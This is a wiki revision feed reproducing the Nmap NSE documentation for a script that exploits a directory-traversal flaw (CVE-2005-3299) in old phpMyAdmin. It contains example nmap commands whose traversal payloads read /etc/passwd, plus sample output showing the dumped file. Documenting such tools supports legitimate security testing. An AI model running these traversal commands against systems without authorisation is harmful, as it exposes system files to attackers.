<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Nmap%3A_phpmyadmin_dir_travesal</id>
	<title>Nmap: phpmyadmin dir travesal - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Nmap%3A_phpmyadmin_dir_travesal"/>
	<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Nmap:_phpmyadmin_dir_travesal&amp;action=history"/>
	<updated>2026-04-20T09:05:02Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Nmap:_phpmyadmin_dir_travesal&amp;diff=45639&amp;oldid=prev</id>
		<title>Onnowpurbo: New page: Sumber: https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html    ==File http-phpmyadmin-dir-traversal==   Script types: portrule  Categories: vuln, exploit  Download: http://n...</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Nmap:_phpmyadmin_dir_travesal&amp;diff=45639&amp;oldid=prev"/>
		<updated>2016-02-14T13:36:31Z</updated>

		<summary type="html">&lt;p&gt;New page: Sumber: https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html    ==File http-phpmyadmin-dir-traversal==   Script types: portrule  Categories: vuln, exploit  Download: http://n...&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Sumber: https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==File http-phpmyadmin-dir-traversal==&lt;br /&gt;
&lt;br /&gt;
 Script types: portrule&lt;br /&gt;
 Categories: vuln, exploit&lt;br /&gt;
 Download: http://nmap.org/svn/scripts/http-phpmyadmin-dir-traversal.nse&lt;br /&gt;
&lt;br /&gt;
==User Summary==&lt;br /&gt;
&lt;br /&gt;
Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.&lt;br /&gt;
&lt;br /&gt;
==Reference:==&lt;br /&gt;
&lt;br /&gt;
    http://www.exploit-db.com/exploits/1244/&lt;br /&gt;
&lt;br /&gt;
Script Arguments&lt;br /&gt;
&lt;br /&gt;
http-phpmyadmin-dir-traversal.dir&lt;br /&gt;
&lt;br /&gt;
Basepath to the services page. Default: /phpMyAdmin-2.6.4-pl1/&lt;br /&gt;
http-phpmyadmin-dir-traversal.file&lt;br /&gt;
&lt;br /&gt;
Remote file to retrieve. Default: ../../../../../etc/passwd&lt;br /&gt;
http-phpmyadmin-dir-traversal.outfile&lt;br /&gt;
&lt;br /&gt;
Output file&lt;br /&gt;
slaxml.debug&lt;br /&gt;
See the documentation for the slaxml library.&lt;br /&gt;
http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent&lt;br /&gt;
See the documentation for the http library.&lt;br /&gt;
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername&lt;br /&gt;
See the documentation for the smbauth library.&lt;br /&gt;
vulns.showall&lt;br /&gt;
See the documentation for the vulns library.&lt;br /&gt;
&lt;br /&gt;
==Example Usage==&lt;br /&gt;
&lt;br /&gt;
 nmap -p80 --script http-phpmyadmin-dir-traversal --script-args=&amp;quot;dir=&amp;#039;/pma/&amp;#039;,file=&amp;#039;../../../../../../../../etc/passwd&amp;#039;,outfile=&amp;#039;passwd.txt&amp;#039;&amp;quot; &amp;lt;host/ip&amp;gt;&lt;br /&gt;
 nmap -p80 --script http-phpmyadmin-dir-traversal &amp;lt;host/ip&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Script Output==&lt;br /&gt;
&lt;br /&gt;
 PORT   STATE SERVICE&lt;br /&gt;
 80/tcp open  http&lt;br /&gt;
 | http-phpmyadmin-dir-traversal:&lt;br /&gt;
 |   VULNERABLE:&lt;br /&gt;
 |   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion&lt;br /&gt;
 |     State: VULNERABLE (Exploitable)&lt;br /&gt;
 |     IDs:  CVE:CVE-2005-3299&lt;br /&gt;
 |     Description:&lt;br /&gt;
 |       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.&lt;br /&gt;
 |&lt;br /&gt;
 |     Disclosure date: 2005-10-nil&lt;br /&gt;
 |     Extra information:&lt;br /&gt;
 |       ../../../../../../../../etc/passwd :&lt;br /&gt;
 |   root:x:0:0:root:/root:/bin/bash&lt;br /&gt;
 |   daemon:x:1:1:daemon:/usr/sbin:/bin/sh&lt;br /&gt;
 |   bin:x:2:2:bin:/bin:/bin/sh&lt;br /&gt;
 |   sys:x:3:3:sys:/dev:/bin/sh&lt;br /&gt;
 |   sync:x:4:65534:sync:/bin:/bin/sync&lt;br /&gt;
 |   games:x:5:60:games:/usr/games:/bin/sh&lt;br /&gt;
 |   man:x:6:12:man:/var/cache/man:/bin/sh&lt;br /&gt;
 |   lp:x:7:7:lp:/var/spool/lpd:/bin/sh&lt;br /&gt;
 |   mail:x:8:8:mail:/var/mail:/bin/sh&lt;br /&gt;
 |   news:x:9:9:news:/var/spool/news:/bin/sh&lt;br /&gt;
 |   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh&lt;br /&gt;
 |   proxy:x:13:13:proxy:/bin:/bin/sh&lt;br /&gt;
 |   www-data:x:33:33:www-data:/var/www:/bin/sh&lt;br /&gt;
 |   backup:x:34:34:backup:/var/backups:/bin/sh&lt;br /&gt;
 |   list:x:38:38:Mailing List Manager:/var/list:/bin/sh&lt;br /&gt;
 |   irc:x:39:39:ircd:/var/run/ircd:/bin/sh&lt;br /&gt;
 |   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh&lt;br /&gt;
 |   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh&lt;br /&gt;
 |   libuuid:x:100:101::/var/lib/libuuid:/bin/sh&lt;br /&gt;
 |   syslog:x:101:103::/home/syslog:/bin/false&lt;br /&gt;
 |   sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin&lt;br /&gt;
 |   dps:x:1000:1000:dps,,,:/home/dps:/bin/bash&lt;br /&gt;
 |   vboxadd:x:999:1::/var/run/vboxadd:/bin/false&lt;br /&gt;
 |   mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false&lt;br /&gt;
 |   memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false&lt;br /&gt;
 |   ../../../../../../../../etc/passwd saved to passwd.txt&lt;br /&gt;
 |&lt;br /&gt;
 |     References:&lt;br /&gt;
 |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299&lt;br /&gt;
 |_      http://www.exploit-db.com/exploits/1244/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html&lt;/div&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
</feed>